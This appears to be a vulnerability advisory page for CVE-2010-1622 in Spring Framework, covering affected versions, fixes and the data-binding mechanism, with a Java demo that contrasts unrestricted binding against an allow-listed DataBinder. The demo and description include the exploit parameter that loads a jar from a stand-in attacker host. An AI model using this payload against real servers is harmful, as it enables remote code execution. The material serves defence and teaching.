First published: Thu Jun 17 2010 (Updated: )
Common Vulnerabilities and Exposures assigned an identifier <a href="https://access.redhat.com/security/cve/CVE-2010-1622">CVE-2010-1622</a> to the following vulnerability:

SpringSource Spring Framework 2.5.x before 2.5.6.SEC02, 2.5.7 before 2.5.7.SR01, and 3.0.x before 3.0.3 allows remote attackers to execute arbitrary code via an HTTP request containing class.classLoader.URLs[0]=jar: followed by a URL of a crafted .jar file.

References:
[1] <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1622">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1622</a>
[2] <a href="http://www.securityfocus.com/archive/1/511877">http://www.securityfocus.com/archive/1/511877</a>
[3] <a href="http://www.exploit-db.com/exploits/13918">http://www.exploit-db.com/exploits/13918</a>
[4] <a href="http://www.springsource.com/security/cve-2010-1622">http://www.springsource.com/security/cve-2010-1622</a>
[5] <a href="http://www.securityfocus.com/bid/40954">http://www.securityfocus.com/bid/40954</a>

Credit: The issue was discovered by Meder Kydyraliev, Google Security Team
Credit: secalert@redhat.com
Affected Software | Affected Version | How to fix |
---|---|---|
Oracle Fusion Middleware | =11.1.1.8.0 | |
Oracle Fusion Middleware | =7.6.2 | |
Oracle Fusion Middleware | =11.1.1.6.1 | |
SpringSource Spring Framework | =2.5.0 | |
SpringSource Spring Framework | =3.0.1 | |
SpringSource Spring Framework | =2.5.3 | |
SpringSource Spring Framework | =3.0.2 | |
SpringSource Spring Framework | =2.5.5 | |
SpringSource Spring Framework | =2.5.6 | |
SpringSource Spring Framework | =2.5.4 | |
SpringSource Spring Framework | =2.5.2 | |
SpringSource Spring Framework | =2.5.7 | |
SpringSource Spring Framework | =3.0.0 | |
SpringSource Spring Framework | =2.5.1 | |
IBM Security Directory Suite VA | <=8.0.1-8.0.1.19 | |
maven/org.springframework:spring | >=3.0.0<=3.0.2 | 3.0.3 |
maven/org.springframework:spring | >=2.5.0<=2.5.7 | 2.5.6.SEC02 (2.5.7.SR01 for the 2.5.7 line) |
redhat/jboss-wfk | <1.0.0-uninstall-0:1.0.0-3.ep5.el4 | 1.0.0-uninstall-0:1.0.0-3.ep5.el4 |
CVE-2010-1622 is a vulnerability in the Spring Framework that allows a remote attacker to execute arbitrary code on the server hosting the application, using nothing more than a crafted HTTP request.
CVE-2010-1622 is caused by Spring's data binding, which maps client-supplied request parameters onto bean properties by nested property path. Every Java object exposes a `class` property (via `getClass()`), so a parameter such as `class.classLoader.URLs[0]=jar:` followed by the URL of an attacker-controlled .jar file is resolved against the web application's class loader and adds that jar to its URL list; code in the jar is then loaded and executed by the application.
The severity of CVE-2010-1622 is high, with a CVSS v2 base score of 7.5.
Oracle Fusion Middleware versions 11.1.1.8.0, 7.6.2 and 11.1.1.6.1, as well as SpringSource Spring Framework 2.5.x (before 2.5.6.SEC02 and 2.5.7 before 2.5.7.SR01) and 3.0.x (before 3.0.3), are affected by CVE-2010-1622.
To fix CVE-2010-1622, update to Spring Framework 2.5.6.SEC02, 2.5.7.SR01, or 3.0.3 (3.0.2 is itself affected), or apply the patches provided by the vendor. Independently of the upgrade, applications should restrict data binding to an explicit list of bindable fields (DataBinder's allowed-fields setting) so that request parameters can never reach properties such as `class`.
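The following is an added example, not code from the Spring project or from the advisory, showing the binding pattern the CVE abuses beside a hardened form. It assumes Spring Framework 3.0 or later (spring-beans and spring-context) on the classpath; `UserForm`, `attackerParams`, `vulnerableBinding`, `hardenedBinding` and the attacker URL are hypothetical names constructed for the demonstration. The request parameters are built inline with `MutablePropertyValues` to stand in for the HTTP request.

```java
import org.springframework.beans.BeansException;
import org.springframework.beans.MutablePropertyValues;
import org.springframework.validation.BindingResult;
import org.springframework.validation.DataBinder;

// Added example (not Spring's own code). Requires a Spring Framework jar on the
// classpath; UserForm, attackerParams and the two binding methods are
// hypothetical names chosen for this demonstration.
public class Cve20101622BindingDemo {

    // A typical form-backing bean. Nothing in it is sensitive; the danger is the
    // implicit "class" property every object inherits from Object.getClass().
    public static class UserForm {
        private String name;
        public String getName() { return name; }
        public void setName(String name) { this.name = name; }
    }

    // Constructed request parameters, standing in for the query string or form
    // body of the HTTP request described in the CVE.
    static MutablePropertyValues attackerParams() {
        MutablePropertyValues pvs = new MutablePropertyValues();
        pvs.add("name", "alice");
        // Nested property path from the CVE: form.getClass().getClassLoader(),
        // then the URLs array of that URLClassLoader-derived loader.
        pvs.add("class.classLoader.URLs[0]", "jar:http://attacker.invalid/evil.jar!/");
        return pvs;
    }

    // Vulnerable pattern: bind every client-supplied parameter with no field
    // restriction. On an affected release the binder walks the nested path into
    // the class loader; on a patched release the path cannot be resolved.
    static BindingResult vulnerableBinding() {
        DataBinder binder = new DataBinder(new UserForm(), "form");
        binder.bind(attackerParams());
        return binder.getBindingResult();
    }

    // Hardened pattern: bind only an explicit allow-list of fields, and deny the
    // whole "class.*" subtree as defense in depth. The allow-list check runs
    // before any property path is resolved, so the attacker's parameter is
    // dropped and recorded as a suppressed field.
    static BindingResult hardenedBinding() {
        DataBinder binder = new DataBinder(new UserForm(), "form");
        binder.setAllowedFields("name");
        binder.setDisallowedFields("class.*");
        binder.bind(attackerParams());
        return binder.getBindingResult();
    }

    public static void main(String[] args) {
        BindingResult hardened = hardenedBinding();
        UserForm form = (UserForm) hardened.getTarget();
        System.out.println("bound name: " + form.getName());
        for (String field : hardened.getSuppressedFields()) {
            System.out.println("suppressed parameter: " + field);
        }

        try {
            BindingResult result = vulnerableBinding();
            System.out.println("unrestricted bind completed, errors=" + result.getErrorCount());
        } catch (BeansException e) {
            // On patched Spring the class-loader path is not bindable and the
            // binder throws instead of silently modifying the class loader.
            System.out.println("unrestricted bind rejected: " + e.getClass().getSimpleName());
        }
    }
}
```

An allow-list is preferable to a deny-list alone: a deny pattern has to anticipate every spelling of a dangerous path, whereas `setAllowedFields` admits only the properties the form actually needs, and `getSuppressedFields()` gives a hook for logging attempts to bind anything else.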